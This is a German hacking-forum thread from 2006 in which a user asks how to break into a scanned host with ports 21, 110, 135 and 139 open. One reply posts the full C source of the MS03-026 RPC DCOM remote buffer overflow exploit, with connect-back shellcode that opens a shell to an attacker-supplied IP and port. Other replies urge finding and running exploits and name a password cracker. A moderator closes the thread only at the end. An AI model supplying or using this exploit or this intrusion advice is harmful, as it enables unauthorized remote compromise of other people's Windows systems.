Was kann ich alles mit offenen Ports machen?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Badkiller, 11. Januar 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 11. Januar 2006
    Hi habe mal ne frage ^^
    Wenn ich ne ip gescannt habe und die angenommen die standartports offen hat z.B. wie

    21 / 110 / 135/ 139

    was für möglich keinten habe ich dann in sein systhem einzudringen.

    PS. das mit dem netbios trick müsst ihr net erklären ^^(oldschool)


    THX 4 help


    ----------------
    edit by pubmarek: Unterlasse bitte die "Hervorhebung"!
     
  2. 11. Januar 2006
    RE: ****Was kann ich alles mit offenen Ports machen ****

    such dir nen exploit,bzw du müsstest wissen was über die ports läuft,in dem falle wären 21-> ftp und 139->PnP interessant,
    such dir mal das PnP Exploit,vllt funzt es ja!
     
  3. 11. Januar 2006
    139 muss ned zwingend pnp sein..aber kannstes trotzdem versuchen.
    21 is wie gesagt ftp, 110 pop3, 135 was von rpc..
    'Windows RPC DCOM Buffer Overflow Remote Exploit (MS03-026)' kann port 135 attackieren (139 auch..):
    Code:
    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>
    #pragma comment(lib,"ws2_32")
    
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,
    0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
    
    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};
    
    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};
    
    unsigned char request3[]={
    0x5C,0x00
    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
    
    
    
    
    unsigned int jmpesp_cn_sp3 = "\x29\x2c\xe2\x77";
    unsigned int jmpesp_cn_sp4 = "\x29\x4c\xdf\x77";
    unsigned int jmpesp_en_xp_sp1="\xdb\x37\xd7\x77";
    
    
    unsigned char sc[]=
     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
     "\x46\x00\x58\x00\x46\x00\x58\x00"
    
     
     "\x29\x4c\xdf\x77"//jmp esp 's address on Windows 2k SP4 Chinese version.
     "\x38\x6e\x16\x76\x0d\x6e\x16\x76" //should be address which can be written.
     //here is SHELLCODE_¿we can use our SHELLCODE_¿but the length must be sizeof
     (shellcode)%16=12
    ,if not please fill with 0x90 
     //SHELLCODE can't has the code such as 0X00 and 0X5C
     "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
     "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
     "\x93\x40\xe2\xfa"
     // code 
     "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
     "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
     "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
     "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
     "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
     "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
     "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
     "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
     "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
     "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
     "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
     "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
     "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
     "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
     "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
     "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
     "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
     "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
     "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
     "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
     "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
     "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
     "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
     "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
     "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
     "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    
    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    
    void main(int argc,char ** argv)
    {
     WSADATA WSAData;
     SOCKET sock;
     int len,len1;
     SOCKADDR_IN addr_in;
     short port=135;
     unsigned char buf1[0x1000];
     unsigned char buf2[0x1000];
     unsigned short port1;
     DWORD cb;
     
     printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
     printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
     printf("Welcome to our English Site: http://www.xfocus.org\n");
     printf("Welcome to our Chinese Site: http://www.xfocus.net\n");
    
    
    if(argc<5)
    {
     printf("useage:%s targetip localIP LocalPort SPVersion\n",argv[0]);
     printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese version +SP4\n 2 winxp English
    version +sp1\n");
    exit(1);
    }
     
    if(atoi(argv[4])==0)
    memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
    else if (atoi(argv[4])==1)
    memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
    else if (atoi(argv[4])==2)
    memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));
    
    
     if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
     {
     printf("WSAStartup error.Error:%d\n",WSAGetLastError());
     return;
     }
    
     addr_in.sin_family=AF_INET;
     addr_in.sin_port=htons(port);
     addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
     
     if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
     {
     printf("Socket failed.Error:%d\n",WSAGetLastError());
     return;
     }
     if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,
     NULL)==SOCKET_ERROR)
     {
     printf("Connect failed.Error:%d",WSAGetLastError());
     return;
     }
     port1 = htons(atoi(argv[3])); 
     port1 ^= 0x9393;
     cb=inet_addr(argv[2]);
     cb ^= 0x93939393;
     *(unsigned short *)&sc[330+0x30] = port1;
     *(unsigned int *)&sc[335+0x30] = cb;
     len=sizeof(sc);
     memcpy(buf2,request1,sizeof(request1));
     len1=sizeof(request1);
     *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; 
     *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
     memcpy(buf2+len1,request2,sizeof(request2));
     len1=len1+sizeof(request2);
     memcpy(buf2+len1,sc,sizeof(sc));
     len1=len1+sizeof(sc);
     memcpy(buf2+len1,request3,sizeof(request3));
     len1=len1+sizeof(request3);
     memcpy(buf2+len1,request4,sizeof(request4));
     len1=len1+sizeof(request4);
     *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
    
     *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 
     *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
     *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
     *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
     *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
     *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
     *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
     if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
     {
     printf("Send failed.Error:%d\n",WSAGetLastError());
     return;
     }
     
     len=recv(sock,buf1,1000,NULL);
     if (send(sock,buf2,len1,0)==SOCKET_ERROR)
     {
     printf("Send failed.Error:%d\n",WSAGetLastError());
     return;
     }
     len=recv(sock,buf1,1024,NULL);
    } 
     
  4. 11. Januar 2006
    könntest du etwas genauer auf diese exploits eingenen , die den port 135 und 139 betreffen^^

    Zb.wie funktioniert das , wie wendich ich die an usw.

    THX noch mal^
     
  5. 11. Januar 2006
    würde mich auch interessieren! hab mal den GUI Lan Guard über nen anderen PC laufen lassen und natürlich offenen Ports gescannt! Wie kann ich also z.b. nen buffer over flow machen? oder eindringen in den rechner? hab keine ahnugn von script und exploit schreiben deßwegen wären tools dafür ganz hilfreich? hab auch mal nach cain und abel geschaut aber was kann ich damit machen? auch offene ports ausnutzen?
     
  6. 11. Januar 2006
    kompilieren (mit nem compiler) oder ne bereits kompilierte version davon finden und benutzen.. vllt. mal google fragen..

    btw: @[=Snake=]: cain und abel is nen password cracking prog.
     
  7. 11. Januar 2006
    auf port 139 kannst noch nach ipc also ntpw checken...

    nur ich würde mich nich an einem server aufhalten, der die paar ports auf hat ;o)
     
  8. 11. Januar 2006
    Was kann man mit den Ports 53, 123, 5632 machen?
     
  9. 11. Januar 2006
    das selbe wie mit den anderen ports exploits suchen und nutzen

    mfg beta
     
  10. 11. Januar 2006
    RE: ****Was kann ich alles mit offenen Ports machen ****

    ohne bannerscan nichts !
     
  11. 11. Januar 2006
    könnte einer nen exploits (schon kompiliert) für den port 139 oder 135 uppen und etwas näher auf explotis allgemein eingenen( was is das ne exe oder ein script ...)
     
  12. 12. Januar 2006
    Exploits können beides sein - Scripte oder Anwendungen. Dies kommt auf die jeweilige Sprach an in der du dein Exploit schreibst.
    Ist dein Exploit z.B. win C geschrieben (was häufig der Fall ist) so musst du den Quellcode compellieren um aus dem Code ein lauffähiges Programm zu machen. Dieses Programm ist dann auch ohne weitere Zusatzprogramme verwendbar.

    Ist dein Exploit z.B. in Perl geschrieben ist dies nicht notwendig, da dein Perlinterpreter das Script einlesen und direkt verarbeiten kann.
    Der Code welcher im Script enthalten ist wird also direkt vom Interpreten (z.b. Perl.exe) übersetzt und abgearbeitet.

    Allgemein:
    Ein Exploit (englisch to exploit - ausnutzen) ist ein Computerprogramm oder Script, welches spezifische Schwächen beziehungsweise Fehlfunktionen eines anderen Computerprogramm ausnutzt um Rechte zu erlangen oder den Betrieb des Ziels zu stören (DOS).

    Als Proof of Concept wird ein Exploit bezeichent welches keinen Schadhaften Code enthält sondern nur zur demonstration der Machbarkeit eines Angriffs diene soll und den betroffenen Softwarehersteller auf diese Art zum schnellen Handeln (Absichern der Software) bewegen soll.

    //reicht das?
     
  13. 22. Februar 2006
    RE: ****Was kann ich alles mit offenen Ports machen ****

    Was ist ein "Bannerscan" ?!

    lg Crux
     
  14. 22. Februar 2006
    Da man jeden Dienst hinter jeden Port setzen kann muss man testen ob hinter Port 80 tatsächlcih z.b. ein Apache webserver v31337 läuft oder doch ein filezilla FTP server ..
    Möglichkeit 1: telnet ip port und schauen welchen Banner der Dienst von scih kommt (z.b. welcome to XodoX filezilla server version 1.0)
    Möglichkeit 2: nmap Nmap - Free Security Scanner For Network Exploration & Security Audits.
    Möglickeit 3: amap THC-AMAP - fast and reliable application fingerprint mapper
    .. usw
     
  15. 22. Februar 2006
    Zuletzt von einem Moderator bearbeitet: 13. April 2017
    Gründe für die Schließung des Themas:


    [*] Sonstiges: Der Threadersteller wird nach den ausführlichen beschreibungen wissen was er mit Ports machen kann. Wir werden hier keine hilfestellungen geben wie du in ein System eindringen kannst oder ähnliches. Beachte bitte das Hacking Requeste verboten sind.

    Lies Dir nochmals die Forenregeln bzw. die Undergroundregeln durch.
     
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.